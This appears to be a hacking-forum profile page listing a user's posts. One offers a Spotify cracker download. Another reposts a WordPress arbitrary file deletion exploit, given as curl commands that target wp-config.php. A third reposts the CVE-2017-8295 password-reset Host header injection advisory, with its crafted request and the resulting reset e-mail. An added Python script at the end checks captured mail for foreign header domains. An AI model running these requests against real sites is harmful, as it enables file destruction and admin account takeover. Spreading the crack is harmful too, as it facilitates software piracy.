behr0uz

Members
  • Posts: 3
  • Joined
  • Last visited

Site reputation: 16 Good

3 followers

About behr0uz

Recent profile visitors

2,015 profile views
  1. behr0uz

    Download Spotify cracker

    Download link: [Hidden Content]
  2. behr0uz

    WordPress Core < 4.9.6 - (Authenticated) Arbitrary File Deletion

    # Exploit Title: Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability
    # Date: 2018-06-27
    # Exploit Author: VulnSpy
    # Vendor Homepage: [Hidden Content]
    # Software Link: [Hidden Content]/download
    # Version: <= 4.9.6
    # Tested on: php7 mysql5
    # CVE :

    Step 1:

    ```
    curl -v '[Hidden Content]' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'
    ```

    Step 2:

    ```
    curl -v '[Hidden Content]' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***'
    ```

    REF:
    Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability Exploit - [Hidden Content]
    WARNING: WordPress File Delete to Code Execution - [Hidden Content]
  3. behr0uz

    WordPress < 4.7.4 - Unauthorized Password Reset

    =============================================
    - Discovered by: Dawid Golunski
    - dawid[at]legalhackers.com
    - [Hidden Content]
    - CVE-2017-8295
    - Release date: 03.05.2017
    - Revision 1.0
    - Severity: Medium/High
    =============================================

    Source: [Hidden Content]

    If an attacker sends a request similar to the one below to a default Wordpress installation that is accessible by the IP address (IP-based vhost):

    -----[ HTTP Request ]----
    POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
    Host: injected-attackers-mxserver.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 56

    user_login=admin&redirect_to=&wp-submit=Get+New+Password
    ------------------------

    Wordpress will trigger the password reset function for the admin user account.

    Because of the modified HOST header, the SERVER_NAME will be set to the hostname of attacker's choice. As a result, Wordpress will pass the following headers and email body to the /usr/bin/sendmail wrapper:

    ------[ resulting e-mail ]-----
    Subject: [CompanyX WP] Password Reset
    Return-Path: <wordpress@attackers-mxserver.com>
    From: WordPress <wordpress@attackers-mxserver.com>
    Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com>
    X-Priority: 3
    MIME-Version: 1.0
    Content-Type: text/plain; charset=UTF-8
    Content-Transfer-Encoding: 8bit

    Someone requested that the password be reset for the following account:

    [Hidden Content]

    Username: admin

    If this was a mistake, just ignore this email and nothing will happen.

    To reset your password, visit the following address:

    <[Hidden Content]wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin>
    -------------------------------

    As we can see, fields Return-Path, From, and Message-ID, all have the attacker's domain set.

    The verification of the headers can be performed by replacing /usr/sbin/sendmail with a bash script of:

    #!/bin/bash
    cat > /tmp/outgoing-email
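
Added example (not part of the original post or the advisory): a Python check for a mail captured by the sendmail replacement described above, flagging Return-Path, From and Message-ID domains that differ from the site's own. The expected domain `companyx.example`, the function names and the sample mail are constructed assumptions.

```python
from email import message_from_string
from email.utils import parseaddr

# Assumption: the domain this site is supposed to send mail from.
EXPECTED_DOMAIN = "companyx.example"
# The three headers the advisory shows taking the Host-derived domain.
AUDITED_HEADERS = ("Return-Path", "From", "Message-ID")

# Constructed sample, modelled on the e-mail quoted in the advisory.
CAPTURED_MAIL = """\
Subject: [CompanyX WP] Password Reset
Return-Path: <wordpress@attackers-mxserver.com>
From: WordPress <wordpress@attackers-mxserver.com>
Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com>
Content-Type: text/plain; charset=UTF-8

Someone requested that the password be reset for the following account:
Username: admin
"""


def header_domain(value):
    """Return the lower-cased domain of an address-like header, or None."""
    _, addr = parseaddr(value)
    if "@" not in addr:
        return None
    return addr.rsplit("@", 1)[1].lower().rstrip(".")


def audit_mail(raw, expected_domain=EXPECTED_DOMAIN):
    """Map each audited header with a missing or unexpected domain to it."""
    msg = message_from_string(raw)
    expected = expected_domain.lower()
    findings = {}
    for name in AUDITED_HEADERS:
        domain = header_domain(msg.get(name, ""))
        # Accept the expected domain and its subdomains; flag the rest.
        ok = domain == expected or (domain or "").endswith("." + expected)
        if not ok:
            findings[name] = domain
    return findings


if __name__ == "__main__":
    for header, domain in audit_mail(CAPTURED_MAIL).items():
        print(f"{header}: unexpected sender domain {domain!r}")
```

An empty result means all three headers carry the expected domain or one of its subdomains; a header that is absent is reported with `None`.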